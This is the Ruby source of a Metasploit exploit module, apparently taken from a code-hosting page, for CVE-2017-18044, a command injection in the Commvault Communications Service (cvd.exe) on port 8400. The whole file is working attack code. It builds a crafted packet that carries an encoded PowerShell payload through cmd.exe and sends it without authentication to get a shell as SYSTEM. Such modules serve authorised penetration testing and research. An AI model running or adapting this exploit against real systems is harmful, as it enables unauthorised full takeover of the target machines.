Path: blob/master/modules/exploits/windows/misc/commvault_cmd_exec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking7include Msf::Exploit::Remote::Tcp8include Msf::Exploit::Powershell910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Commvault Communications Service (cvd) Command Injection',15'Description' => %q{16This module exploits a command injection vulnerability17discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP518and v10). The vulnerability exists in the cvd.exe service and allows an19attacker to execute arbitrary commands in the context of the service. By20default, the Commvault Communications service installs and runs as SYSTEM in21Windows and does not require authentication. This vulnerability was discovered22in the Windows version. The Linux version wasn't tested.23},24'License' => MSF_LICENSE,25'Author' => [26'b0yd', # @rwincey / Vulnerability Discovery and MSF module author27],28'References' => [29['CVE', '2017-18044'],30['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']31],32'Platform' => 'win',33'Targets' => [34[35'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',36{37'Arch' => [ARCH_X64, ARCH_X86]38}39],40],41'Privileged' => true,42'DefaultTarget' => 0,43'DisclosureDate' => '2017-12-12',44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options([Opt::RPORT(8400)])53end5455def exploit56buf = build_exploit57print_status("Connecting to Commvault Communications Service.")58connect59print_status("Executing payload")60# Send the payload61sock.put(buf)62# Handle the shell63handler64disconnect65end6667def build_exploit68# Get encoded powershell of payload69command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')70# Remove additional cmd.exe call71psh = "powershell"72idx = command.index(psh)73command = command[(idx)..-1]7475# Build packet76cmd_path = 'C:\Windows\System32\cmd.exe'77msg_type = 978zero = 079payload = ""80payload += make_nops(8)81payload += [msg_type].pack('I>')82payload += make_nops(328)83payload += cmd_path84payload += ";"85payload += ' /c "'86payload += command87payload += '" && echo '88payload += "\x00"89payload += [zero].pack('I>')9091# Add length header and payload92ret_data = [payload.length].pack('I>')93ret_data += payload9495ret_data96end97end9899100